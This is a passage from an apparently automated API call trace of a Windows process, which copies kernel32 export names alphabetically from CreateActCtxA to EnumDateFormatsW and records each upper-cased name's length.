lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0030.860] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0030.860] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0030.860] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0030.860] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0030.860] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0030.860] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0030.860] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0030.860] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0030.860] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0030.860] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0030.860] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0030.860] lstrlenA (lpString="CREATEEVENTA") returned 12 [0030.860] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0030.860] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0030.861] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0030.861] lstrlenA (lpString="CREATEEVENTW") returned 12 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0030.861] lstrlenA (lpString="CREATEFIBER") returned 11 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0030.861] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0030.861] lstrlenA (lpString="CREATEFILEA") returned 11 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0030.861] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0030.861] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0030.861] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0030.861] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0030.861] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0030.861] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0030.861] lstrlenA (lpString="CREATEFILEW") returned 11 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0030.861] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0030.861] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0030.861] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0030.861] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0030.861] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0030.862] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0030.862] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0030.862] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0030.862] lstrlenA (lpString="CREATEJOBSET") returned 12 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0030.862] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0030.862] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0030.862] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0030.862] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0030.862] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0030.862] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0030.862] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0030.862] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0030.862] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0030.862] lstrlenA (lpString="CREATEPIPE") returned 10 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0030.862] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0030.862] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0030.862] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0030.862] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0030.863] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0030.863] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0030.863] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0030.863] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0030.863] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0030.863] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0030.863] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0030.863] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0030.863] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0030.863] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0030.863] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0030.863] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0030.863] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0030.863] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0030.863] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0030.863] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0030.863] lstrlenA (lpString="CREATETHREAD") returned 12 [0030.863] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0030.863] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0030.864] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0030.864] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0030.864] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0030.864] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0030.864] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0030.864] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0030.864] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0030.864] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0030.864] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0030.864] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0030.864] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0030.864] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0030.864] lstrlenA (lpString="CTRLROUTINE") returned 11 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0030.864] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0030.864] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0030.864] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0030.864] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0030.865] lstrlenA (lpString="DEBUGBREAK") returned 10 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0030.865] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0030.865] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0030.865] lstrlenA (lpString="DECODEPOINTER") returned 13 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0030.865] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0030.865] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0030.865] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0030.865] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0030.865] lstrlenA (lpString="DELETEATOM") returned 10 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0030.865] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0030.865] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0030.865] lstrlenA (lpString="DELETEFIBER") returned 11 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0030.865] lstrlenA (lpString="DELETEFILEA") returned 11 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0030.865] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0030.865] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0030.865] lstrlenA (lpString="DELETEFILEW") returned 11 [0030.865] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0030.866] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0030.866] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0030.866] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0030.866] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0030.866] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0030.866] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0030.866] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0030.866] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0030.866] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0030.866] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0030.866] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0030.866] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0030.866] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0030.866] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0030.866] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0030.866] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0030.866] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0030.866] lstrcpyA (in: lpString1=0xc9dc14, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0030.867] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0030.867] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0030.867] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0030.867] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0030.867] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0030.867] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0030.867] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0030.867] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0030.867] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0030.867] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0030.867] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0030.867] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0030.867] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0030.867] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0030.867] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0030.867] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0030.867] lstrcpyA (in: lpString1=0xc9dc14, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") 